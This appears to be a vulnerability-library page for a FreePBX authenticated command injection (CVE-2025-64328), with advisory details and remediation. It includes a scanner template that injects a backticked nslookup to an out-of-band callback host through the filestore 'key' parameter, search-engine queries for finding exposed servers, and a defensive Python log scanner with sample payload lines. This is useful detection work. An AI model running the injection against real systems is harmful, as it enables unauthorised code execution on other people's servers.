
FreePBX >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection

CVE-2025-64328
Verified

Description

FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in the filestore module's testconnection check_ssh_connect() function, letting authenticated users execute commands as the asterisk user.

Severity

Critical

CVSS Score

8.6

Exploit Probability

82%

Affected Product

freepbx

Published Date

March 7, 2026

Template Author

_th3y

CVE-2025-64328.yaml
id: CVE-2025-64328

info:
  name: FreePBX >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection
  author: _th3y
  severity: critical
  description: |
    FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in the filestore module's testconnection check_ssh_connect() function, letting authenticated users execute commands as the asterisk user.
  impact: |
    Authenticated attackers can execute arbitrary commands as the asterisk user, gaining remote access to the system.
  remediation: |
    Upgrade to version 17.0.3 or later.
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 8.6
    cve-id: CVE-2025-64328
    epss-score: 0.82118
    epss-percentile: 0.99227
    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
    - https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
    - https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog
  metadata:
    vendor: sangoma
    product: freepbx
    shodan-query:
      - http.title:"freepbx"
      - http.favicon.hash:"-1908328911"
      - http.favicon.hash:"1574423538"
      - http.title:"freepbx administration"
    fofa-query:
      - icon_hash="-1908328911"
      - icon_hash="1574423538"
      - title="freepbx administration"
      - title="freepbx"
    google-query:
      - intitle:"freepbx administration"
      - intitle:"freepbx"
  tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln,kev,vkev

variables:
  username: "{{username}}"
  password: "{{password}}"
  cmd: "nslookup {{interactsh-url}}"
  prefix: "{{rand_text_alpha(5)}}"

flow: http(1) && http(2)


http:
  - method: POST
    path:
      - "{{BaseURL}}/admin/config.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "username={{username}}&password={{password}}"

    matchers:
      - type: word
        part: body
        words:
          - 'FreePBX Administration'
          - 'Hello, {{username}}'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
    headers:
      Referer: "{{BaseURL}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
# digest: 4a0a00473045022100a838f0bc4fe65c6cdf5f2474ed4f6438286ba6b1e446afe995a287b182b29fab02202aca2f96db3ab4940119a95ce25917adca51dfcb1dc6d418bc5e1ce78aa681ba:922c64590222798bb761d5b6d8e72950
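The template above probes the filestore testconnection endpoint with a shell metacharacter in a query parameter. On the defending side, the same request shape is what an access-log review should look for: legitimate use of that endpoint comes from an admin testing a real SSH backup target, so a hostname, username, key path or remote path carrying a backtick, `$(`, `;` or `|` is the signal, not the endpoint itself. The scanner below is an added example written for this page; it is not code from the vulnerability library entry or from the FreePBX project. It assumes Apache/nginx combined log format, the sample log lines are constructed, and the metacharacter list is a conservative assumption about what injection attempts look like rather than a statement about how FreePBX parses the input.

```python
"""Access-log detection for shell metacharacters sent to the FreePBX filestore
testconnection endpoint (added example; not from the page's template or from FreePBX)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: host ident user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Sequences that have no place in a hostname, username, key path or remote path handed to
# an SSH connectivity check. Assumption: a conservative shell-metacharacter list.
SHELL_META = ("`", "$(", ";", "|", "&&", "\n")


def is_testconnection(target: str) -> bool:
    """True when the request target is the filestore testconnection endpoint seen in the template."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/ajax.php"):
        return False
    q = parse_qs(parts.query, keep_blank_values=True)
    return q.get("module") == ["filestore"] and q.get("command") == ["testconnection"]


def suspicious_params(target: str) -> dict:
    """Return {param: decoded value} for every query parameter containing a shell metacharacter.
    parse_qs already percent-decodes once; the extra unquote() also catches double-encoded
    values such as %2560, so a raw backtick and %60 are treated the same."""
    q = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name, values in q.items():
        for value in values:
            decoded = unquote(value)
            if any(meta in decoded for meta in SHELL_META):
                hits[name] = decoded
    return hits


def scan_log(lines):
    """Return (source_ip, timestamp, param, value) tuples for each testconnection request that
    carries a shell metacharacter in any parameter. The endpoint alone is not flagged, since an
    authenticated admin legitimately uses it to test a backup destination."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these separately
        target = m.group("target")
        if not is_testconnection(target):
            continue
        for param, value in suspicious_params(target).items():
            findings.append((m.group("src"), m.group("time"), param, value))
    return findings


# Constructed sample lines, not real traffic. Line 1 is a benign admin test of a real backup
# host; line 2 mirrors the template's request shape with the backtick percent-encoded as an
# HTTP client would send it; line 3 carries the backtick raw; line 4 is an unrelated login.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Mar/2026:10:00:01 +0000] "GET /admin/ajax.php?module=filestore&command=testconnection'
    '&driver=SSH&host=backup.example.internal&user=backup&port=22&key=/home/asterisk/.ssh/id_rsa'
    '&path=/srv/backups HTTP/1.1" 200 123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Mar/2026:10:00:07 +0000] "GET /admin/ajax.php?module=filestore&command=testconnection'
    '&driver=SSH&host=127.0.0.1&user=abcde&port=22&key=abcde%60nslookup%20example.oast.invalid%60'
    '&path=abcde HTTP/1.1" 200 45 "https://pbx.example.internal" "Go-http-client/1.1"',
    '203.0.113.9 - - [07/Mar/2026:10:00:09 +0000] "GET /admin/ajax.php?module=filestore&command=testconnection'
    '&driver=SSH&host=127.0.0.1&user=x&port=22&key=x`hostname`&path=x HTTP/1.1" 200 45 "-" "curl/8.0"',
    '10.0.0.5 - - [07/Mar/2026:10:01:00 +0000] "POST /admin/config.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for src, ts, param, value in scan_log(SAMPLE_LOG):
        print(f"[{ts}] {src} testconnection param {param!r} contains shell metacharacters: {value!r}")
```

Run against the samples it reports the two requests from 203.0.113.9 and stays silent on the admin's legitimate test. Pair the alert with the login event from http(1) in the template (the POST to /admin/config.php) to attribute it to an account, and treat any hit on a FreePBX host below 17.0.3 as a likely exploitation attempt rather than noise.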
CVSS Score: 8.6

CVSS Metrics

CVSS Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE ID:
CVE-2025-64328

References

https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog

Remediation Steps

Upgrade to version 17.0.3 or later.